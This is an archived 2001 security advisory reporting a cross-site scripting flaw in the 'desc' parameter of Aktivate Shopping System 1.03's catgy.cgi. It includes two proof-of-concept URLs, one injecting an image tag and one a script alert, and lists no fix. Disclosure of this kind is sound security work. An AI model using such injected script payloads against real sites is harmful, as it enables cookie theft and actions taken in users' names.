TUCoPS :: Web :: e-commerce, shopping carts :: web4946.htm

Aktivate Shopping System Cross Site Scripting Vulnerability
20th Dec 2001 [SBWID-4946]
COMMAND

	Aktivate Shopping System Cross Site Scripting Vulnerability

SYSTEMS AFFECTED

	Aktivate 1.03 (And may be other)

PROBLEM

	Tamer Sahin [http://www.securityoffice.net] posted :
	

	Cross Site Scripting, most dynamic  websites  are  still  not  filtering
	user  input.  This  lets  remote  sites  access  to  write  scripts   on
	vulnerable  sites  &  application,  stealing   cookies,   performing
	actions on behalf of user or modifying look of content on site.
	 

	https://host/aktivate/cgi-bin/catgy.cgi?key=0&cartname=axa200135022551

	089&desc=<IMG%20height=47%20src=\"http://www.tamersahin.net/images/titl

	e.gif\"%20width=406%20border=0>

	

	https://host/aktivate/cgi-bin/catgy.cgi?key=0&cartname=axa200135022551

	089&desc=<script>alert(document.domain)</script>

	

SOLUTION

	Nothing yet.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH